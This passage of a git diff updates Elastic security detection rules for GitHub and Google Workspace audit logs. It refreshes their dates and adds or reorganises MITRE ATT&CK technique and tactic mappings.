-updated_date = "2025/12/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,23 +84,30 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -113,12 +120,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml index 5b6539b9114..6cb779a03d6 100644 --- a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml +++ b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["github"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,23 +73,26 @@ event.dataset:"github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - - [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.actor_ip"] diff --git a/rules/integrations/github/persistence_github_org_owner_added.toml b/rules/integrations/github/persistence_github_org_owner_added.toml index 6ebccba2979..ab17df05ed0 100644 --- a/rules/integrations/github/persistence_github_org_owner_added.toml +++ b/rules/integrations/github/persistence_github_org_owner_added.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,19 +72,46 @@ iam where event.dataset == "github.audit" and event.action == "org.add_member" a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.003" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1136/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/github/persistence_new_pat_created.toml b/rules/integrations/github/persistence_new_pat_created.toml index ff972644a35..ca627a7c411 100644 --- a/rules/integrations/github/persistence_new_pat_created.toml +++ b/rules/integrations/github/persistence_new_pat_created.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,6 +72,16 @@ github.category == "personal_access_token" and event.action == "personal_access_ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/integrations/github/persistence_organization_owner_role_granted.toml b/rules/integrations/github/persistence_organization_owner_role_granted.toml index c8b2b1f0fc5..b4352967199 100644 --- a/rules/integrations/github/persistence_organization_owner_role_granted.toml +++ b/rules/integrations/github/persistence_organization_owner_role_granted.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -70,19 +70,36 @@ iam where event.dataset == "github.audit" and event.action == "org.update_member [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml index 8b50df9d34a..7cab15de693 100644 --- a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml +++ b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/24" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,19 +101,31 @@ event.dataset:"google_workspace.admin" and event.action:"CREATE_DATA_TRANSFER_RE [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1074" name = "Data Staged" reference = "https://attack.mitre.org/techniques/T1074/" + [[rule.threat.technique.subtechnique]] id = "T1074.002" name = "Remote Data Staging" reference = "https://attack.mitre.org/techniques/T1074/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml index 36138972133..464366aa8c5 100644 --- a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml +++ b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,19 +102,31 @@ file where event.dataset == "google_workspace.drive" and event.action : ("copy", [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml index ba8f4a4f7f8..6306e9be4c1 100644 --- a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml +++ b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,19 +107,23 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.type:" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml index 50b9fd776ed..987573a3585 100644 --- a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml +++ b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,19 +99,28 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.007" name = "Disable or Modify Cloud Firewall" reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml index 3da71e49a09..c6a45f868a9 100644 --- a/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml +++ b/rules/integrations/google_workspace/defense_evasion_google_workspace_bitlocker_setting_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,23 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml b/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml index dbe8480ee6b..625a14b96ce 100644 --- a/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml +++ b/rules/integrations/google_workspace/defense_evasion_google_workspace_new_oauth_login_from_third_party_application.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/30" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,39 +90,57 @@ google_workspace.token.scope.data: *Login and google_workspace.token.client.id: [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["google_workspace.token.client.id"] diff --git a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml index 09ecde61c16..2b52d566d85 100644 --- a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml +++ b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,19 +108,23 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml b/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml index b55c2591321..6ca7e8646d2 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_admin_role_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,14 +99,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1531" name = "Account Access Removal" reference = "https://attack.mitre.org/techniques/T1531/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml index 5c62a0f8be1..25db102037c 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,14 +103,49 @@ event.dataset:google_workspace.admin and event.provider:admin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1531" name = "Account Access Removal" reference = "https://attack.mitre.org/techniques/T1531/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml index 9da5f09028e..9ae1d29e3c6 100644 --- a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml +++ b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/16" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,19 +104,31 @@ iam where event.dataset == "google_workspace.admin" and event.action == "ADD_GRO [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml index e3a60da3cd3..1b4990aa49c 100644 --- a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml +++ b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,19 +94,41 @@ event.dataset:google_workspace.admin and event.category:iam and event.action:UNS [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml index 46a1d328e83..afa271c9bad 100644 --- a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml +++ b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,19 +116,54 @@ sequence by source.user.email with maxspan=3m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml index 90cf5ef9b6e..88bf490d5ac 100644 --- a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml +++ b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,8 +104,17 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml index 4647fb4aed4..5e354b05b51 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/26" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,14 +103,39 @@ event.dataset:"google_workspace.login" and event.action:"2sv_disable" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml index a23661911b2..6d63f4458ff 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,19 +107,36 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml b/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml index 2a59b14eadc..0783b41bddd 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_dwd.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/12" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,14 +104,26 @@ event.dataset:google_workspace.admin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml index 643c9d27e06..6ccf74de94f 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,14 +104,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = 